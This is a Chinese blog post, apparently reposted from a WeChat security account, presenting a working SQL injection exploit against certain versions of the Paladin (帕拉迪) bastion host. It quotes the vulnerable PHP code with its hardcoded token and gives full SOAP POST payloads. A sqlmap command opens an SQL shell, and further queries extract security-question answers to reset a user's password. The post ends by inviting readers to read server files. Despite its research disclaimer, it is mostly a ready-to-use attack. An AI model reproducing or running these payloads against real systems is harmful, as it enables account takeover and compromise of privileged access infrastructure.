查看版本
https://xxx.com/index.php/Public/about
ST00001B105<=未知版本<ST00001B109
上述版本中间的未知版本需要自行测试,具体到哪个版本就没有详细测试了
这里为了方便回显,寻找流程简单一点的,具体代码如下:
function getAccountDetail($data)
{
$obj = json_decode($data);
$token = md5("pc#@%ccW".date("Ymd")."99!&cs");
$acct = array();
if($token == $obj->token)
{
$tmp = mysql_query("SELECT id FROM user WHERE account='".$obj->user."' limit 1");
$row = mysql_fetch_array($tmp,MYSQL_ASSOC);
if(empty($row))
{
return json_encode($acct);
}
$uid = $row['id'];
$res = mysql_query("select a.*, d.dev_ip, d.dev_name from t_cfg_dev_list d, t_cfg_acct_list a, t_cfg_res_priv r where d.dev_prep = 0 AND d.dev_disable = 0 AND a.acct_disable = 0 AND a.dev_id = d.id and a.id = '".$obj->acctid."' and r.acct_id = a.id and r.usr_id = '" .$uid . "'");
while($arr = mysql_fetch_assoc($res))
{
$acct[] = $arr;
}
}
return json_encode($acct);
}
由于token硬编码,所以可以进入if导致sql注入,构造数据包如下:
POST /sslvpnservice.php HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/89.0.4389.90 Safari/537.36
Connection: close
Cookie: PHPSESSID=8fdj8pske96v2qdg13g36u8872; think_language=zh-cn
Content-Type: text/xml
Content-Length: 580
<SOAP-ENV:Envelope SOAPENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAPENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAPENC="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<getAccountDetail>
<data>
{"token":"4e28b56969e59a18d72d0050a47f812a","user":"superman","acctid":"-1' or
1=if(1=1,1,2) limit 0,1 -- a","index":"1"}</data>
</getAccountDetail>
</SOAP-ENV:Body></SOAP-ENV:Envelope>
我们构造sqlmap方便注入的数据包:
POST /sslvpnservice.php HTTP/1.1
Host: xxxx
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/89.0.4389.90 Safari/537.36
Cookie: PHPSESSID=8fdj8pske96v2qdg13g36u8872; think_language=zh-cn
Content-Type: text/xml
Content-Length: 580
<SOAP-ENV:Envelope SOAPENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAPENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAPENC="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<getAccountDetail>
<data>
{"token":"4e28b56969e59a18d72d0050a47f812a","user":"superman","acctid":"-1' or
1=if(1=1*,1,2) limit 0,1 -- a","index":"1"}</data>
</getAccountDetail>
</SOAP-ENV:Body></SOAP-ENV:Envelope>
sqlmap语句
python2 sqlmap.py -r 1.txt --proxy http://127.0.0.1:8080 --force-ssl --freshqueries --dbms=mysql --delay 1 --sql-shell
查询superman账号id,因为user表中id参数对应t_cfg_usr_epw表中的usr_id参数,由此判定user表中id 即为userid
select id from user where account='superman' limit 0,1
查询密保答案
select answer from user_secret where usr_id=1
select answer2 from user_secret where usr_id=1
我们试试(答案2随便填写)
可以看到答案完全没问题
由于重置密码会自动生成密码并修改,具有破坏性,按情况使用。
由于权限够高,可以通过注入读取服务器文件,大家自行构造吧!
----------------------------关注我查看其他文章----------------------------
原文始发于微信公众号(安全学习与分享):帕拉迪堡垒机(某些版本)sql注入
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论